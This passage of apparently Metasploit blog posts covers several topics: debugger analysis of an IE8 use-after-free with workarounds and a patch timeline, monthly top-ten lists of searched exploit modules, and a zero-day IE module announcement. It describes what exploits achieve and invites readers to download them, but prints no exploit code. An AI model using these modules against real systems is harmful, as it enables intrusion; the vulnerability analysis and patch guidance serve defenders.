0:008> !heap -p -a poi(0x0563cfb0) address 06a99fc8 found in _DPH_HEAP_ROOT @ 151000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 5087390: 6a99fc8 38 -  6a99000 2000 mshtml!CGenericElement::`vftable'     7c918f01 ntdll!RtlAllocateHeap 0x00000e64     635db42e mshtml!CGenericElement::CreateElement 0x00000018     635a67f5 mshtml!CreateElement 0x00000043     637917c0 mshtml!CMarkup::CreateElement 0x000002de     63791929 mshtml!CDocument::CreateElementHelper 0x00000052     637918a2 mshtml!CDocument::createElement 0x00000021     635d3820 mshtml!Method_IDispatchpp_BSTR 0x000000d1     636430c9 mshtml!CBase::ContextInvokeEx 0x000005d1     63643595 mshtml!CBase::InvokeEx 0x00000025     63643832 mshtml!DispatchInvokeCollection 0x0000014b     635e1cdc mshtml!CDocument::InvokeEx 0x000000f1     63642f30 mshtml!CBase::VersionedInvokeEx 0x00000020     63642eec mshtml!PlainInvokeEx 0x000000ea     633a6d37 jscript!IDispatchExInvokeEx2 0x000000f8     633a6c75 jscript!IDispatchExInvokeEx 0x0000006a     633a9cfe jscript!InvokeDispatchEx 0x00000098 And freed during garbage collection: 0:008> !heap -p -a poi(0x0563cfb0) address 06a99fc8 found in _DPH_HEAP_ROOT @ 151000 in free-ed allocation (  DPH_HEAP_BLOCK: VirtAddr VirtSize) 5087390: 6a99000 2000 7c927553 ntdll!RtlFreeHeap 0x000000f9     636b52c6 mshtml!CGenericElement::`vector deleting destructor' 0x0000003d 63628a50 mshtml!CBase::SubRelease 0x00000022     63640d1b mshtml!CElement::PrivateRelease 0x00000029     6363d0ae mshtml!PlainRelease 0x00000025     63663c03 mshtml!PlainTrackerRelease 0x00000014     633a10b4 jscript!VAR::Clear 0x0000005c     6339fb4a jscript!GcContext::Reclaim 0x000000ab     6339fd33 jscript!GcContext::CollectCore 0x00000113     63405594 jscript!JsCollectGarbage 0x0000001d     633a92f7 jscript!NameTbl::InvokeInternal 0x00000137     633a6650 jscript!VAR::InvokeByDispID 0x0000017c     633a9c0b jscript!CScriptRuntime::Run 0x00002989     633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack 
0x000000ff     633a59f7 jscript!ScrFncObj::Call 0x0000008f     633a5743 jscript!CSession::Execute 0x00000175 Even though the CGenericElement vftable is freed, the reference is stil kept: 0:008> dc 0x0563cfb0; .echo; dc poi(0x0563cfb0) 0563cfb0  06a99fc8 00000000 ffff0075 ffffffff  ........u....... 0563cfc0  00000071 00000000 00000000 00000000  q............... 0563cfd0  00000000 0563cfd8 00000152 00000001  ......c.R....... 0563cfe0  00000000 00000000 0563cfc0 00000000  ..........c..... 0563cff0  00000010 00000000 00000000 d0d0d0d0  ................ 0563d000  ???????? ???????? ???????? ????????  ???????????????? 0563d010  ???????? ???????? ???????? ????????  ???????????????? 0563d020  ???????? ???????? ???????? ????????  ???????????????? 06a99fc8  ???????? ???????? ???????? ????????  ???????????????? 06a99fd8  ???????? ???????? ???????? ????????  ???????????????? 06a99fe8  ???????? ???????? ???????? ????????  ???????????????? 06a99ff8  ???????? ???????? ???????? ????????  ???????????????? 06a9a008  ???????? ???????? ???????? ????????  ???????????????? 06a9a018  ???????? ???????? ???????? ????????  ???????????????? 06a9a028  ???????? ???????? ???????? ????????  ???????????????? 06a9a038  ???????? ???????? ???????? ????????  ???????????????? And of course, this invalid reference ends up with a crash when used by mshtml!CElement::Doc(): 0:008> g (5f4.2c0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=63aae200 ebx=0563cfb0 ecx=06a99fc8 edx=00000000 esi=037cf0b8 edi=00000000 eip=6363fcc4 esp=037cf08c ebp=037cf0a4 iopl=0 nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00010246 mshtml!CElement::Doc: 6363fcc4 8b01 mov eax,dword ptr [ecx]  ds:0023:06a99fc8=???????? As of now, we are not aware of any patch from Microsoft specifically for IE8, but we will be updating this blog as soon as we hear something.  
If you're a current IE8 user, then please consider the following workarounds:

For newer Windows, upgrade to Internet Explorer 9 or 10.
For Windows XP users, please use other browsers such as Google Chrome or Mozilla Firefox.
If for some reason you must use Internet Explorer 8, please use EMET.
Or, you can also try setting IE's security zone to High, and customize your Active Scripting settings.

Note that while Microsoft's advisory also suggests setting IE8's Internet security zones to 'High' for ActiveX controls, this, by itself, will not mitigate the issue -- the exploitation technique used here does not leverage ActiveX controls at all. So, while that is generally good advice, it will not help in this case.

If you'd like to try out this Metasploit module to better validate your defenses, please feel free to download Metasploit here. If you already have Metasploit Framework, you may just use the msfupdate utility to receive this module. For Metasploit Pro users, you will see this module in the upcoming update.

Special thanks to: EMH

Timeline

May 3rd - Microsoft advisory 2847140, no patch yet.
May 5th - Metasploit releases ie_cgenericelement_uaf exploit
May 8th - Microsoft releases "fix-it"
May 14th - Microsoft releases MS13-038 patch

Exploit Trends: Top 10 Searches for Metasploit Modules in October


Time for your monthly dose of Metasploit exploit trends! Each month we gather this list of the most searched exploit and auxiliary modules from the Metasploit database. To protect users' privacy, the statistics come from analyzing webserver logs of searches, not from monitoring Metasploit usage.

October was a quiet month for exploit headlines, so not a whole lot of action on the list. The high traffic to Java and IE modules from their respective 0-days settled down, so you'll see some shuffling of order from that. Check out October's exploit and auxiliary modules below, annotated with Tod Beardsley's commentary.

1. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four-year-old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It's also got a great pile of language pack targets. All of Metasploit's exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you've ever heard of. This exploit is also not ancient, so it's reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft's Security TechCenter. Up three places from #4 last month.

2. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody's gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Up three places from #5 last month.

3. Java 7 Applet Remote Code Execution: Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshaw. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. Down one place from #2 last month.

4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine-year-old vulnerability that used to be the de facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It's now pretty much a case study in stack buffer overflows in Windows, so it's got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Up two places from #6 last month.

5. MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability: This bug started off with Eric Romang's blog post and ended up with a module being cooked up over a weekend by Eric, @binjo, and the Metasploit exploit dev team. This event, like the Java 0-day, had the net effect of speeding up the vendor's patch schedule. If there was no public, open exploit, would there have been a patch so rapidly? Was it connected with the Java 0-day? Who's the primary source for these critical client-side bugs, anyway? These and other questions are still being speculated on and debated in the security industry and security press. Down two places from #3 last month.

6. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It's not sexy, but it's super handy for testing payloads and setup. I'd bet it's the most-used module in classroom and test environments. More on this topic at the National Vulnerability Database. Up two places from #8 last month.

7. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: Not sure why this module is still popular -- it's a client-side DoS. Historically, it's a neat DoS, since it demos a bug in Windows 7's kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. Up three places from #10 last month.

8. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six-year-old vulnerability that's notable in that there's no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic at Microsoft's Security TechCenter. Down one place from #7 last month.

9. PHP CGI Argument Injection: This exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installations, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. Back from #8 on August's Exploit Trends.

10. Apache mod_isapi <= 2.2.14 Dangling Pointer: Although this is an exploit in Apache, don't be fooled! It's only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module's release), and it's only a DoS. Again, kind of a mystery as to why it's so popular. Down one place from #9 last month.

If you'd like to try out any of these exploits, download Metasploit for free!

Exploit Trends: Java and IE 0days


Each month we report the top ten searched exploit and auxiliary modules on metasploit.com. The statistics are drawn from our exploit database by analyzing webserver logs of searches, not through Metasploit usage, which is not tracked to preserve privacy.

With the Java and Internet Explorer 0-days in August and September, this month's exploit trends from Metasploit really shook up the status quo. And, just to make things more interesting, there are a couple of exploits from April that came back for an encore at numbers 9 & 10.

Without further ado, here are September's Top Ten Exploits with commentary from Metasploit guru todb.

1. Java Atomic Reference Array Type Violation Vulnerability (CVE-2012-0507): A returning entry from the April Top 10, this module makes its comeback because of all the Java 0-day traffic from August. This was initially discovered in the wild as a Java 0-day, and this module represented the fevered work of sinn3r and Juan Vazquez, who turned out the first reliable public cross-platform exploit for the bug. The blog post "CVE-2012-0507 - Java Strikes Again" shows a screenshot of Meterpreter sessions on Windows, Ubuntu, and OSX systems. In fact, this may be the first publicly demonstrable Java exploit that just works against all three platforms for the vulnerable versions of Java -- no extra configuration or fingerprinting is needed. Returning entry from the April Top 10 Exploits.

2. Java 7 Applet Remote Code Execution: Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshaw. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. Down one place from #1 last month.

3. MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability: This bug started off with Eric Romang's blog post and ended up with a module being cooked up over a weekend by Eric, @binjo, and the Metasploit exploit dev team. This event, like the Java 0-day, had the net effect of speeding up the vendor's patch schedule. If there was no public, open exploit, would there have been a patch so rapidly? Was it connected with the Java 0-day? Who's the primary source for these critical client-side bugs, anyway? These and other questions are still being speculated on and debated in the security industry and security press. New entry this month.

4. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four-year-old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It's also got a great pile of language pack targets. All of Metasploit's exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you've ever heard of. This exploit is also not ancient, so it's reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft's Security TechCenter. Down two places from #2 since last month.

5. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody's gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down two places from #3 since last month.

6. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine-year-old vulnerability that used to be the de facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It's now pretty much a case study in stack buffer overflows in Windows, so it's got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Down two places from #4 since last month.

7. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six-year-old vulnerability that's notable in that there's no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic at Microsoft's Security TechCenter. Down two places from #5 since last month.

8. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It's not sexy, but it's super handy for testing payloads and setup. Even though it's a lowly #10, I'd bet it's the most-used module in classroom and test environments. More on this topic at the National Vulnerability Database. Down two places from #6 since last month.

9. Apache mod_isapi <= 2.2.14 Dangling Pointer: Another returning module from April, although why this one's back is a bit more of a mystery. Although this is an exploit in Apache, don't be fooled! It's only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module's release), and it's only a DoS. Again, kind of a mystery as to why it's so popular. Returning entry from the April Top 10 Exploits.

10. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: The third April comeback module, and still not sure why this module is popular -- it's a client-side DoS. Historically, it's a neat DoS, since it demos a bug in Windows 7's kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. Returning entry from the April Top 10 Exploits.

If you want to use any of these exploits right now, you can download Metasploit for free!

New Metasploit 0-day exploit for IE 7, 8 & 9 on Windows XP, Vista, and 7


We have some Metasploit freshness for you today: A new zero-day exploit for Internet Explorer 7, 8, and 9 on Windows XP, Vista and 7. Computers can get compromised simply by visiting a malicious website, which gives the attacker the same privileges as the current user. Since Microsoft has not released a patch for this vulnerability yet, Internet users are strongly advised to switch to other browsers, such as Chrome or Firefox, until a security update becomes available. The exploit had already been used by malicious attackers in the wild before it was published in Metasploit. The associated vulnerability puts about 41% of Internet users in North America and 32% world-wide at risk (source: StatCounter). We have added the zero-day exploit module to Metasploit to give the security community a way to test if their systems are vulnerable and to develop counter-measures.

Here's the back story: Some of you may remember that a couple of weeks ago, the Metasploit exploit team released a blog regarding a new Java exploit (CVE-2012-4681), with a blog entry titled "Let's Start the Week with a New Java 0day in Metasploit". You'd think the 0-day attack from the same malicious group might cool down a little after that incident... well, you'd be wrong. Because last weekend, our fellow researcher and Metasploit contributor Eric Romang just spotted another 0-day, possibly from the same group, exploiting a Microsoft Internet Explorer use-after-free vulnerability.

The Metasploit team has had the pleasure to work with Mr. Romang and @binjo together, and pretty soon we had a working exploit. You may download Metasploit here, and apply the latest update to pick up the exploit.

The following screenshot demonstrates a successful attack against a Windows 7 machine with Internet Explorer 9 installed:

This one is against Internet Explorer 8 installed:

Here's another example exploiting a fully-patched Windows XP SP3 box:

The exploit also works against Windows Vista, but I think you guys get the point now.

To try out this module, get your free Metasploit download now, or update your existing installation. In the meantime, we will keep this blog updated when more progress has been made.

==========

UPDATE:

Sep 17th, 2012 - Microsoft releases advisory 2757760: http://technet.microsoft.com/en-us/security/advisory/2757760
Sep 18th, 2012 - CVE assigned as: CVE-2012-4969
Sep 19th, 2012 - Microsoft releases "fix-it", and it has been verified working. More information can be found here. We still advise users to use the Metasploit module to test if the workaround is working properly or not, because even if the installer says "the fix has been processed", exploitation could still happen under specific circumstances. Here's an example.
Sep 20th, 2012 - Microsoft updates the "fix-it" advisory to revision 2.0. Requirements clarified: 1) "For computers that are running 64-bit operating systems, the following Fix it solution only applies to 32-bit versions of Internet Explorer." 2) Before you apply this Fix it solution, you must ensure that Internet Explorer is fully updated by using the Windows Update service.
Sep 21st, 2012 - Microsoft releases MS12-063. Please apply the patch ASAP!
Sep 25th, 2012 - Make sure to check out Eric's blog post on "How to find latest IE vulnerability (CVE-2012-4969) with Nexpose"

Exploit Trends: August Java 0-day


Coming from August's Java 0-day release, there are three new Java exploits among the top 10 most searched Metasploit exploits and auxiliary modules in this month's trend list. The monthly statistics are drawn from our exploit database by analyzing webserver logs of searches on metasploit.com, not through Metasploit usage, which is not tracked for privacy.

Check out the top searched exploits and modules below, annotated with Tod Beardsley's excellent comments:

1. Java 7 Applet Remote Code Execution: Of course, this is the reason why all the other Java modules leapt up in the rankings, in case you've been on safari for the last several weeks and haven't heard the story yet. Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshaw. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. New entry this month.

2. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four-year-old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It's also got a great pile of language pack targets. All of Metasploit's exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you've ever heard of. This exploit is also not ancient, so it's reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft's Security TechCenter. Down one place from #1 last month.

3. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody's gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down one place from #2 last month.

4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine-year-old vulnerability that used to be the de facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It's now pretty much a case study in stack buffer overflows in Windows, so it's got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Same position as last month.

5. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six-year-old vulnerability that's notable in that there's no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic at Microsoft's Security TechCenter. Down 2 places from #3 last month.

6. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It's not sexy, but it's super handy for testing payloads and setup. Even though it's a lowly #10, I'd bet it's the most-used module in classroom and test environments. More on this topic in the National Vulnerability Database. Up two places from #7 since last month.

7. Java Signed Applet Social Engineering Code Execution: Like the Adobe PDF Embedded EXE Social Engineering module, this is a really solid go-to module for social engineering payloads. A simple Google search turns up dozens of demonstration videos from all around the world on how to use this module. Up one place from #8 since last month.

8. PHP CGI Argument Injection: This exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installations, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. More info on this on a blog at Serge Security. Up one place from #9 since last month.

9. Java Applet Rhino Script Engine Remote Code Execution: This module from late November of 2011 used to be the go-to Java exploit for browser targets - of course, that all changed with the new Java 0-day we released this month. This module most likely jumped up the rankings as everyone and their brother pawed through the Metasploit Exploit DB for all things Java. We got a ton of coverage on the Java 0-day event, so that aura certainly skewed the numbers for this module, even when it was already pretty popular. New entry since last month.

10. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it's on this list, it's probably the most popular social engineering-style module. More on this topic at the National Vulnerability Database. Same position as last month.

If you want to use any of these exploits right now, you can download Metasploit for free!
